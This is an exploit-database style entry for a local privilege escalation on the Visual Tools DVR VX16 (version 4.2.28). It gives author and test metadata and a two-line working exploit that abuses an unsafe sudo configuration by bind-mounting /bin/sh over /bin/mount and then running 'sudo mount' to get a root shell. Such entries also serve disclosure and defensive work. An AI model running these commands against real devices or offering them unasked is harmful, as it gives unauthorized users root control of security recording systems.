Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation

2021-07-06
ID: 104555
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.

#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.

sudo mount -o bind /bin/sh /bin/mount
sudo mount
1-4-2 (www01)